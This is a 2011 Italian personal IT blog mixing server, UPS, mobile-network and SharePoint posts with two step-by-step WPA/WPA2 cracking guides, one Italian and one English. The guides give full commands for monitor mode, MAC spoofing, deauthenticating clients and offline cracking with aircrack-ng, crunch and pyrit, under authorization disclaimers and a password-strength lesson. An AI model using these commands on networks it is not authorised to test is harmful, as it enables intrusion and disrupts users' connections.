Argomenti

giovedì 8 dicembre 2011

04102011826.jpg

Inviati dal mio telefono Nokia

08122011989.jpg

Test Upload foto su google+ da n97

venerdì 25 novembre 2011

Nuovo server ESXi 5.0!
Hypervisor installato su una pendrive!
Una seconda pendrive, clonata, in caso di rottura.



giovedì 13 ottobre 2011

APC: Marca di M....

Oggi ho simpaticamente scoperto che gli UPS APC con le batterie scariche o difettose, una volta spenti non si riaccendono più!

Bene:
Va via la corrente, le batterie cedono. Cade tutto.

Torna la corrente... E che bella sorpresa NON VA NULLA!
L'UPS non si può nemmeno riaccendere a mano!!! SCANDALOSO!!!!

Per riaccendere i nostri server dobbiamo aspettare che arrivino le batterie nuove.

Provato subito con un altro gruppo della "EPC" (European Power Conversion". Chiaramente il gruppo si accende anche senza batterie... segnalandomi che è senza batterie...

Provato con un "Emerson's Liebert".. Ovviamente anche lui si accende tranquillamente senza batterie e mi segnala che c'è un problema sulle batterie.


Per non parlare dello stato delle batterie dopo 3-4 anni.

Altre marche: Batterie praticamente nuove.  (Perfettamente funzionanti)
APC: Batterie che si allargano ed esplodono con conseguente uscita di acido/gel

Bisogna smontare tutto il gruppo per tirare fuori i pezzi delle batterie...

Postero presto le foto.

Altra cagata che non sopporto:

4 x Batterie Cinesi 12V 7A/h = 40 Euro
4 x BOSH Made in Germany di altissima qualità: 120 Euro
Batterie Originali APC (Cinesi!!)= 260 Euro (??? CINQUE VOLTE TANTO ???)

Saranno gli adesivi che APC mette sopra le sua batterie cinesi che costano oltre 100€ l'uno?
O sarà anche che almeno ti costringono a cambiare ogni 3 anni?

SCANDALOSO:

APC = QUALITA' VERAMENTE BASSA = SCHIFEZZA!!

mercoledì 12 ottobre 2011

Rete WIND Milano - Celle 3G (UMTS - HSDPA) sature!!

Negli ultimi 2 mesi, la qualità della connessione dati Wind nella mia zona (P.ta Genova / P.ta Ticinese) è peggiorata in maniera incredibile. Alle 5 di notte: 6 MEGABIT.. alle 22 di sera: 0 bit/s
Segnale 5 su 6... e per magari 4-5 minuti 0K/s !!!!!!!!
Continuano a cadere anche le chiamate voce..

Mi sa che qualche volta, la cella 3G va in palla e fa un reboot che magari dura anche 10 minuti.
Forse lo switch voce tra un ponte 3G e GSM non si può fare e tutte le chiamate in corso sulla cella 3G cadono.

Poco fa ho chiamato il 155.. Dopo nemmeno 1 minuto mi risponde un operatore molto gentile ed educato.
Gli parlo del mio problema.. in pratica mi dice:
Si si.. le celle di Milano, soprattutto nella sua zona, sono congestionate. Molti clienti chiamano per lamentarsi...

Nemmeno lui però aveva la minima idea di quando Wind risolverà il problema.

WIND RIPIGLIATEVI!!
 Nel frattempo prenderò una ricaricabile con un altro operatore....

Ho scritto questo articolo giusto per CONDIVIDERE.

domenica 25 settembre 2011

Attaccare WPA/WPA2 con Back|Track 5 (CPU e CUDA) ITA


Guida : Attaccare reti wifi WPA/WPA2 con Back|Track 5 (CPU e CUDA)


Basato su: http://samiux.blogspot.com/2011/05/howto-wpawpa2-cracking-with-backtrack-5.html

Attenzione: Non operare su reti wifi senza autorizzazione.
Lo scopo di questa guida è fornire una conoscienza della sicurezza delle proprie reti.

A livello aziendale, una prova di attacco alla propria rete (penetration - testing) è un’ottima attività per sicurity - hardening.
Si può vedere infatti nell’articolo, nel cado del wpa/wpa2 che una password complessa, non necessariamente molto lunga, diventa quasi impossibile da craccare.



(A) Solo CPU / scheda grafica generica

Passo 1 :

airmon-ng

Se la vostra scheda di rete viene identificata, il risultato dovrebbe essere tipo:

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Passo 2 :

airmon-ng start wlan0

Questo comando fa partire la vostra scheda wifi in modalità “monitor”  (indispensabile).
A questo punto, la nostra nuova scheda di rete virtuale mon0, è in grado di catturare tutti i pacchetti da e verso l’ap.
Se la scheda wifi non sopporta la modalità monitor/promisqua non vi conviene impazzire cercando i driver.
Con una chiavetta wifi da 10-12 euro risolvete al volo.

Passo 3 (Opzionale cambio mac) :

E’ possibile volendo, cambiare l’indirizzo fisico della scheda mon0 (mac address)

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Passo 4 :

airodump-ng mon0

Airdump inizia a catturare alcuni pacchetti.
Dopo alcuni secondi premere "Ctrl+c" per fermare il programma.

Passo 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

Dove:   -c è il canale
-w è il file da scrivere
            --bssid is the BSSID

Per determinare il BSSID vi sono vari tool.
Su Back-track 5 si puo trovare “GERIX” una GUI per aircrack che rende semplici molte cose.

A questo punto, continuiamo a catturare pacchetti finchè un client si autentica.

Passo 6 :

Se siamo abbastanza vicini all’AP e c’è un client connesso, si possono mandare dei segnali di deautenticazione e obbligarlo ad andare per un po’ off-line.

In un nuovo terminale (mentre airdump sta catturando)

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:38:72:36:45:24 mon0

Dove:  -a è il BSSID
       -c è il mac address del client connesso (si vede nel terminale di airdump)

Dopo alcuni secondo il client torna on-line e a quel punto airdump cattura l’handshake.

A questo punto possiamo fermare il programma.
Il crack della rete viene fatto off-line.

Passo 7 :

Possiamo usare John the Ripper come un dizionario per crackare la password WPA/WP2.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Passo 8 (Opzionale) :

Anzichè John the Ripper come dizionario, si può usare Crunch.

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

Dove 8 16 è la lunghezza della passwordis (da 8 caratteri a 16 caratteri).


(B) Con scheda grafica nVidia con CUDA

Se si dispone di una scheda grafica nVidia con CUDA, è possibile usare pyrit per craccare la password con crunch.
I passi da 1 a 6 servono per catturare il pacchetto handshake da craccare.
Seguire i seguenti passi per utilizzare cuda.


Passo 9 :

Installiamo le librerie necessarie:
apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Passo 10 :

http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

Passo 11 :

http://code.google.com/p/pyrit/downloads/list

Scaricare pyrit e cpyrit-cuda

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install

Passo 12:

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

Dove 8 16 è la lunghezza della passwordis (da 8 caratteri a 16 caratteri).

Passo 13 (Opzionale) :

Se si presenta un errore leggendo wpacrack-01.cap eseguire:

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough


Passo 14 :

Risultato:

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.

Note:

Se si dispone di una nVidia GeForce GTX460 (336 CUDA cores), il sistema dovrebbe arrivare a 17,000 passwords al secondo

Per testare se la scheda wireless (sia USB che PCI-eo PCI) può fare injection :

airodump-ng mon0

Aprire un altro terminale

aireplay-ng -9 mon0

Per vedere se pyrit funziona sul tuo sistema:

pyrit list_cores

venerdì 16 settembre 2011

All-in-one Micro Server vmware ESXi 5 - DQ57TM


Micro Server assemblato!





Hardware
- Mainboard Micro ATX Intel® Desktop Board DQ57TM
- Case Antec NSK 1380 (350W)
- 4GB RAM DDR3 (2x 2GB) dual channel
- 2X HDD 250GB SATA (mid range)
- CPU Intel Core i3 550 @ 3.2Ghz
- 2X Network Interface (Integrated LAN + PCI Intel Pro 1000)


Main S.O. (hypervisor)
VMware ESXi 5.0 – the new release of the thinnest, most advanced virtualization hypervisor.

VM S.O.
- Windows Server 2008 R2 Foundation (Max 15 Users) - 3.5GB ram and 1NIC
- pfSense - Open Source FreeBSD based firewall - 256MB ram and 2NIC


Virtual Switch:
VM Network - connected to NIC0 (integrated) for LAN
WAN - connected to NIC1 (PCI Card) for WAN












lunedì 29 agosto 2011

FreeBSD 8.2 - Vmware Image


http://www.thoughtpolice.co.uk/vmware/

FreeBSD 8.2, standard install. new! 

Notes: Root password is "thoughtpolice"
Quick start HOWTO: soon! For now see FreeBSD 7.0 in 1 minute
32-bit: freebsd-8.2-i386.zip, 183M
fast torrent download!web download
md5sum: d118c69806c92c14b7629693387e3c7a
64-bit: freebsd-8.2-amd64.zip, 198M
fast torrent download!web download
md5sum: 3d7a88dc0e68db6310ead029f33dc928

giovedì 25 agosto 2011

AirCrack performance su Intel I7 in ambiente Windows

Ecco le performance di Aircrack sul mio PC Intel I7 (Win7 Utlimate 64)
Sembra tenere una media di 4300 parole al secondo.
Il mio portatile Centrino2 a 1,6Ghz fa una media di 800 parole/s

Tra breve test con PYRIT / CUDA con nvidia 8800GT! Dovremmo passare le 10.000 parole/s!!!!


Questi sono i dati della CPU (un pelino overclockata!)



Crack WPA/WPA2 con BackTrack 5 + Pyrit

http://samiux.blogspot.com/2011/05/howto-wpawpa2-cracking-with-backtrack-5.html


HOWTO : WPA/WPA2 cracking with Back|Track 5

Don't crack any wifi router without authorization; otherwise, you will be put into the jail.

(A) General Display card

Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step 4 :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]



Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up


Step d :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install


Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install


tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install


Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the wpacrack-01.cap, you should do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.


Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0

Make sure pyrit workable on your system :

pyrit list_cores

That's all! See you.


Installing Aircrack-ng for Windows


http://wirelessdefence.org/Contents/Aircrack-ng_WinInstall.htm

Installing Aircrack-ng for Windows:


Last Update: April 2010



NOTE: Only a relatively small number of Wireless cards are supported under the Windows version of Aircrack-ng .  See the Project Homepages compatibility list for full details.

NOTE: For the standard user we recommend not using greater than version aircrack-ng-0.9.3-win as aircrack-ng-1.0-winand above requires the use of cygwin and custom .dll files.


Ensure you have the appropriate windows monitor mode drivers installed for your card (not the standard drivers that came with your card).

Download aircrack-ng-0.9.3-win.zip for Windows from: http://www.aircrack-ng.org/ 

Download Peek.zip which contains: PEEK.DLL, PEEK5.SYS and MSVCR70.DLL from http://www.tuto-fr.com/tutoriaux/crack-wep/fichiers/wlan/winxp/Peek.zip

Extract aircrack-ng-0.9.3.zip to C:\

Extract Peek.zip (i.e. the files Peek.dll, Peek5.sys and msvcr70.dll) into the directory: C:\aircrack-0.9.3-win\bin

cd C:\aircrack-ng-0.9.3-win\bin

Run airodump-ng.exe or aircrack-ng GUI.exe and hopefully you'll have an interactive window to interact with your wireless card.

Job done : )

There is a nice troubleshooting guide on the project homepage if you have any issues: http://aircrack-ng.org/doku.php?id=airodump-ng#windows_specific




Reg ha scritto:
praticamente se sono in presenza di Ap con Wap2 ho bisogno per forza di cose di un client collegato
Ho capito bene..??

Si! Hai capito bene. Anche con wpa.
Provato! Funziona. Il cracking poi viene fatto off-line.
Il problema è che il criptaggio è abbastanza pesante.
Il mio Centrino 2 (portatile) fa 800 parole al secondo.
Su una bella macchina potremmo arrivare anche a 10.000 (?)
Con dizionari giganteschi (ne ho trovato uno da 10 giga!) occorrerebbero comunque dei giorni e con scarsa probabilità.

Se per esempio la pwd è: DEgf!2wa  diventa già abbastanza difficile..

Password composte da nomi, date, marche sarebbero da evitare.

Gli attacchi brute-force in questo caso non hanno senso (256 bit!!).
As of August 17, 2010, distributed.net estimates that cracking a 72-bit key using current hardware will take about 48,712 days or 133.5 years




mercoledì 1 giugno 2011

SharePoint hotfix problema ID ( 33002 ) - MSSQL$MICROSOFT##SSEE

Post-installation information

After you apply this hotfix package, you must run the SharePoint Products and Technologies Configuration Wizard.

To do this, click Start, point to All Programs, point to Administrative Tools, and then click SharePoint Products and Technologies Configuration Wizard.

Important Because of a problem with the hotfix installation, you must not run the SharePoint Products and Technologies Configuration Wizard to complete the installation if you are running a Windows SharePoint Services stand-alone installation that uses the Windows Internal Database Engine. Instead, you must use the Psconfig.exe command-line utility. To do this, follow these steps:

1.

Click Start, click Run, type cmd in the Open box, and then click OK.

2.

Change to the following directory:

system drive\Program Files\Common Files\Microsoft Shared\Web Server Extensions\12\Bin

3.

Run the following command:

psconfig -cmd upgrade -inplace b2b

If you ran the SharePoint Products and Technologies Configuration Wizard, you may experience a long delay, and the wizard may not be completed successfully. 

Alternatively, the configuration process may be unsuccessful, and you may receive the following error messages:

Configuration Failed

An exception of type System.Data.SQLClient.SQLException was thrown. Additional exception information access to module dbo.proc_MSS_GetConfigurationProperty is blocked because the signature is not valid.

Additionally, the following event may be logged in the Application log:

Event ID: 5586 
Source: Windows SharePoint Services 3 
Unknown SQL Exception 33002 occured. 
Additional error information from SQL Server is included below. 
Access to module dbo.proc_MSS_GetConfigurationProperty is blocked because the signature is not valid.

If you experience these issues, use the Psconfig.exe command to manually complete the installation of the hotfix. 

Cerca nel blog